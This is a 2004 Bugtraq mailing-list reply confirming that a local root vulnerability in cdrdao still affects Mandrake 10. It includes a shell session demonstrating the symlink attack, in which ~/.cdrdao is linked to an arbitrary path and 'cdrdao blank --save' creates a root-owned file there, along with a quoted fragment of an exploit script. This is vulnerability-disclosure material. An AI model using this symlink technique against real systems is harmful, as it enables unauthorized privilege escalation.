<<< Date Index >>>     <<< Thread Index >>>

Re: cdrdao local root exploit



In-Reply-To: <1157225765.20040907131857@xxxxxxxxxxxxxxxx>

The vuln is still exist in cdrdao 1.1.9-5mdk + Mandrake 10 (beta 2).
I think cdrdao should drop root permission before save the config.
[newbug@localhost tmp]$ ls -al /blah
ls: /blah: No such file or directory
[newbug@localhost tmp]$ ln -s /blah .cdrdao
[newbug@localhost tmp]$ rpm -qf `which cdrdao`
cdrdao-1.1.9-5mdk
[newbug@localhost tmp]$ cdrdao blank --save
.
.
.
[newbug@localhost tmp]$ ls -al /blah
-rw-rw-r--  1 root cdwriter 32 10&#26376;  2 10:41 /blah
[newbug@localhost tmp]$

newbug Tseng

>Received: (qmail 6527 invoked from network); 7 Sep 2004 21:09:36 -0000
>Received: from mail2.securityfocus.com (205.206.231.1)
>  by mail.securityfocus.com with SMTP; 7 Sep 2004 21:09:36 -0000
>Received: (qmail 13209 invoked by alias); 7 Sep 2004 21:11:52 -0000
>Delivered-To: archive-bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 13206 invoked from network); 7 Sep 2004 21:11:52 -0000
>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) 
>(205.206.231.26)
>  by mail2.securityfocus.com with SMTP; 7 Sep 2004 21:11:52 -0000
>Received: from lists2.securityfocus.com (lists2.securityfocus.com 
>[205.206.231.20])
>       by outgoing2.securityfocus.com (Postfix) with QMQP
>       id 4864914374E; Tue,  7 Sep 2004 09:06:54 -0600 (MDT)
>Mailing-List: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@xxxxxxxxxxxxxxxxx>
>List-Help: <mailto:bugtraq-help@xxxxxxxxxxxxxxxxx>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@xxxxxxxxxxxxxxxxx>
>List-Subscribe: <mailto:bugtraq-subscribe@xxxxxxxxxxxxxxxxx>
>Delivered-To: mailing list bugtraq@xxxxxxxxxxxxxxxxx
>Delivered-To: moderator for bugtraq@xxxxxxxxxxxxxxxxx
>Received: (qmail 26314 invoked from network); 7 Sep 2004 03:04:40 -0000
>Date: Tue, 7 Sep 2004 13:18:57 +0400
>From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
>Reply-To: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
>Organization: http://www.security.nnov.ru
>X-Priority: 3 (Normal)
>Message-ID: <1157225765.20040907131857@xxxxxxxxxxxxxxxx>
>To: =?Windows-1251?B?Suly9G1lIEFUSElBUw==?= <jerome.athias@xxxxxxxxxxxx>
>Cc: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: Re: cdrdao local root exploit
>In-Reply-To: <20040905191642.18379.qmail@xxxxxxxxxxxxxxxxxxxxx>
>References: <20040905191642.18379.qmail@xxxxxxxxxxxxxxxxxxxxx>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=Windows-1251
>Content-Transfer-Encoding: 8bit
>
>Dear Jérôme ATHIAS,
>
>This  bug  was  originally  reported  to  Bugtraq  by Andreas Mueller on
>January, 15 2002
>
>--Sunday, September 5, 2004, 11:16:42 PM, you wrote to 
>bugtraq@xxxxxxxxxxxxxxxxx:
>
>JA> if [ ! -L $HOME/.cdrdao ];then echo "Could'n link to \$HOME/.cdrdao"
>
>
>
>-- 
>~/ZARAZA
>Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü.  (Òâåí)
>
>